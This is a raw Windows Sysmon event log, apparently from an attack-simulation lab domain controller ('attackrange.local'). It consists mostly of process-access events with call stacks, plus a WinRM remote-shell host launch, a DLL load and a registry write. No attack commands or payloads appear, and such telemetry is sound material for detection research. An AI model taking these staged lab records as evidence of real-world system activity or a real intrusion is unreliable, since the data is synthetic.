13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.479{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.438{59A5CD1D-8E6F-6005-8100-00000000A301}4548C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.345{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005db) 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.204{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
